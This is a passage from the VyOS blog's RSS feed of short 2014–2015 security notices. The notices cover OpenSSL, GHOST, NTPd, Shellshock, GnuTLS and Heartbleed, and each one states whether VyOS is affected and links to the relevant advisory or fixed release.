      <guid>https://blog.vyos.io/index.php/2015/08/17/cve-2015-5366-116-maintenance-release-and-the</guid>
      <dc:date>2015-08-17T15:37:30Z</dc:date>
    </item>
    <item>
      <title>OpenSSL vulnerabilities</title>
      <link>https://blog.vyos.io/openssl-vulnerabilities-dsa-3197-1</link>
      <description>&lt;p&gt;Multiple vulnerabilities were &lt;a href="https://www.debian.org/security/2015/dsa-3197"&gt;discovered and fixed&lt;/a&gt; in OpenSSL.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Multiple vulnerabilities were &lt;a href="https://www.debian.org/security/2015/dsa-3197"&gt;discovered and fixed&lt;/a&gt; in OpenSSL.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fopenssl-vulnerabilities-dsa-3197-1&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Fri, 20 Mar 2015 19:08:37 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/openssl-vulnerabilities-dsa-3197-1</guid>
      <dc:date>2015-03-20T19:08:37Z</dc:date>
    </item>
    <item>
      <title>CVE-2015-0235</title>
      <link>https://blog.vyos.io/index.php/2015/01/28/cve-2015-0235</link>
      <description>&lt;p&gt;You’ve probably heard of &lt;a href="https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt"&gt;CVE-2015-0235&lt;/a&gt; already: buffer overflow in glibc gethostbyname() function allows for arbitrary code execution.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;You’ve probably heard of &lt;a href="https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt"&gt;CVE-2015-0235&lt;/a&gt; already: buffer overflow in glibc gethostbyname() function allows for arbitrary code execution.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2015%2F01%2F28%2Fcve-2015-0235&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Wed, 28 Jan 2015 01:00:18 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2015/01/28/cve-2015-0235</guid>
      <dc:date>2015-01-28T01:00:18Z</dc:date>
    </item>
    <item>
      <title>NTP vulnerability update</title>
      <link>https://blog.vyos.io/index.php/2014/12/23/ntp-vulnerability-update</link>
      <description>&lt;p&gt;Squeeze-LTS team imported patches for those vulnerabilities, so it’s probably the best to take the path of least resistance and just use those.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Squeeze-LTS team imported patches for those vulnerabilities, so it’s probably the best to take the path of least resistance and just use those.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F12%2F23%2Fntp-vulnerability-update&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Tue, 23 Dec 2014 09:51:05 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/12/23/ntp-vulnerability-update</guid>
      <dc:date>2014-12-23T09:51:05Z</dc:date>
    </item>
    <item>
      <title>CVE-2014-9295: arbitrary code execution in NTPd</title>
      <link>https://blog.vyos.io/index.php/2014/12/23/cve-2014-9295-arbitrary-code-execution-in-ntpd</link>
      <description>&lt;p&gt;A recently discovered &lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295"&gt;vulnerability&lt;/a&gt; in NTPd allows remote code execution.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;A recently discovered &lt;a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295"&gt;vulnerability&lt;/a&gt; in NTPd allows remote code execution.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F12%2F23%2Fcve-2014-9295-arbitrary-code-execution-in-ntpd&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Tue, 23 Dec 2014 01:24:55 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/12/23/cve-2014-9295-arbitrary-code-execution-in-ntpd</guid>
      <dc:date>2014-12-23T01:24:55Z</dc:date>
    </item>
    <item>
      <title>1.1.0 preview image update</title>
      <link>https://blog.vyos.io/index.php/2014/09/26/110-preview-image-update</link>
      <description>&lt;p&gt;Those who are using 1.1.0-beta can install &lt;a href="http://dev.packages.vyos.net/iso/helium/amd64/VyOS-livecd-1409261838-177b25f-amd64.iso"&gt;an updated image&lt;/a&gt; from the build system that includes updates for the shellshock vulnerability.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Those who are using 1.1.0-beta can install &lt;a href="http://dev.packages.vyos.net/iso/helium/amd64/VyOS-livecd-1409261838-177b25f-amd64.iso"&gt;an updated image&lt;/a&gt; from the build system that includes updates for the shellshock vulnerability.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F09%2F26%2F110-preview-image-update&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>Uncategorized</category>
      <category>update</category>
      <pubDate>Fri, 26 Sep 2014 19:16:13 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/09/26/110-preview-image-update</guid>
      <dc:date>2014-09-26T19:16:13Z</dc:date>
    </item>
    <item>
      <title>1.0.5 security release</title>
      <link>https://blog.vyos.io/index.php/2014/09/26/105-security-release</link>
      <description>&lt;p&gt;1.0.5 release images are available for download from &lt;a href="http://packages.vyos.net/iso/release/1.0.5/"&gt;packages.vyos.net&lt;/a&gt;, and soon will be available from mirrors when they sync.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;1.0.5 release images are available for download from &lt;a href="http://packages.vyos.net/iso/release/1.0.5/"&gt;packages.vyos.net&lt;/a&gt;, and soon will be available from mirrors when they sync.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F09%2F26%2F105-security-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Fri, 26 Sep 2014 15:12:21 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/09/26/105-security-release</guid>
      <dc:date>2014-09-26T15:12:21Z</dc:date>
    </item>
    <item>
      <title>bash and apt vulnerabilities</title>
      <link>https://blog.vyos.io/index.php/2014/09/25/bash-and-apt-vulnerabilities</link>
      <description>&lt;p&gt;Recently discovered vulnerabilities in &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271"&gt;bash&lt;/a&gt; and &lt;a href="https://www.debian.org/security/2014/dsa-3031"&gt;APT&lt;/a&gt; are low risk for VyOS, since it doesn’t use CGI scripts written in bash and APT is not normally used for upgrades, but we will release an updated 1.0.x image nonetheless and include the fixes in upcoming 1.1.0 release as well.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Recently discovered vulnerabilities in &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271"&gt;bash&lt;/a&gt; and &lt;a href="https://www.debian.org/security/2014/dsa-3031"&gt;APT&lt;/a&gt; are low risk for VyOS, since it doesn’t use CGI scripts written in bash and APT is not normally used for upgrades, but we will release an updated 1.0.x image nonetheless and include the fixes in upcoming 1.1.0 release as well.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F09%2F25%2Fbash-and-apt-vulnerabilities&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Thu, 25 Sep 2014 10:26:13 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/09/25/bash-and-apt-vulnerabilities</guid>
      <dc:date>2014-09-25T10:26:13Z</dc:date>
    </item>
    <item>
      <title>CVE-2014-4607</title>
      <link>https://blog.vyos.io/index.php/2014/06/27/cve-2014-4607</link>
      <description>&lt;p&gt;There is a &lt;a href="http://seclists.org/oss-sec/2014/q2/665"&gt;vulnerability&lt;/a&gt; in LZO implementation discovered recently.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;There is a &lt;a href="http://seclists.org/oss-sec/2014/q2/665"&gt;vulnerability&lt;/a&gt; in LZO implementation discovered recently.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F06%2F27%2Fcve-2014-4607&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Fri, 27 Jun 2014 08:14:27 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/06/27/cve-2014-4607</guid>
      <dc:date>2014-06-27T08:14:27Z</dc:date>
    </item>
    <item>
      <title>OpenSSL vulnerabilities</title>
      <link>https://blog.vyos.io/index.php/2014/06/08/openssl-vulnerabilities</link>
      <description>&lt;p&gt;As you should already know, several &lt;a href="https://www.openssl.org/news/secadv_20140605.txt"&gt;security vulnerabilities&lt;/a&gt; in OpenSSL were discovered recently.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;As you should already know, several &lt;a href="https://www.openssl.org/news/secadv_20140605.txt"&gt;security vulnerabilities&lt;/a&gt; in OpenSSL were discovered recently.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F06%2F08%2Fopenssl-vulnerabilities&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Sun, 08 Jun 2014 04:16:57 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/06/08/openssl-vulnerabilities</guid>
      <dc:date>2014-06-08T04:16:57Z</dc:date>
    </item>
    <item>
      <title>GNUTLS-SA-2014-3</title>
      <link>https://blog.vyos.io/index.php/2014/06/02/gnutls-sa-2014-3</link>
      <description>&lt;p&gt;A security issue in GnuTLS (&lt;a href="http://www.gnutls.org/security.html#GNUTLS-SA-2014-3"&gt;GNUTLS-SA-2014-3&lt;/a&gt;) can cause client memory corruption if the server sends specially crafted ServerHello.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;A security issue in GnuTLS (&lt;a href="http://www.gnutls.org/security.html#GNUTLS-SA-2014-3"&gt;GNUTLS-SA-2014-3&lt;/a&gt;) can cause client memory corruption if the server sends specially crafted ServerHello.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F06%2F02%2Fgnutls-sa-2014-3&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Mon, 02 Jun 2014 12:06:00 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/06/02/gnutls-sa-2014-3</guid>
      <dc:date>2014-06-02T12:06:00Z</dc:date>
    </item>
    <item>
      <title>CVE-2014-0160</title>
      <link>https://blog.vyos.io/index.php/2014/04/08/cve-2014-0160</link>
      <description>&lt;p&gt;VyOS 1.0.x uses OpenSSL 0.9.8o, and thus is not affected by &lt;a href="https://www.openssl.org/news/secadv_20140407.txt"&gt;CVE-2014-0160&lt;/a&gt;. No action is needed.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;VyOS 1.0.x uses OpenSSL 0.9.8o, and thus is not affected by &lt;a href="https://www.openssl.org/news/secadv_20140407.txt"&gt;CVE-2014-0160&lt;/a&gt;. No action is needed.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F04%2F08%2Fcve-2014-0160&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Tue, 08 Apr 2014 06:50:04 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/04/08/cve-2014-0160</guid>
      <dc:date>2014-04-08T06:50:04Z</dc:date>
    </item>
    <item>
      <title>GNUTLS-SA-2014-2</title>
      <link>https://blog.vyos.io/index.php/2014/03/05/gnutls-sa-2014-2</link>
      <description>&lt;p&gt;In a nutshell: nothing really uses it in VyOS so we think it’s not enough to trigger maintenance release.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;In a nutshell: nothing really uses it in VyOS so we think it’s not enough to trigger maintenance release.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2014%2F03%2F05%2Fgnutls-sa-2014-2&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <category>announcement</category>
      <pubDate>Wed, 05 Mar 2014 20:08:15 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2014/03/05/gnutls-sa-2014-2</guid>
      <dc:date>2014-03-05T20:08:15Z</dc:date>
    </item>
  </channel>
</rss>
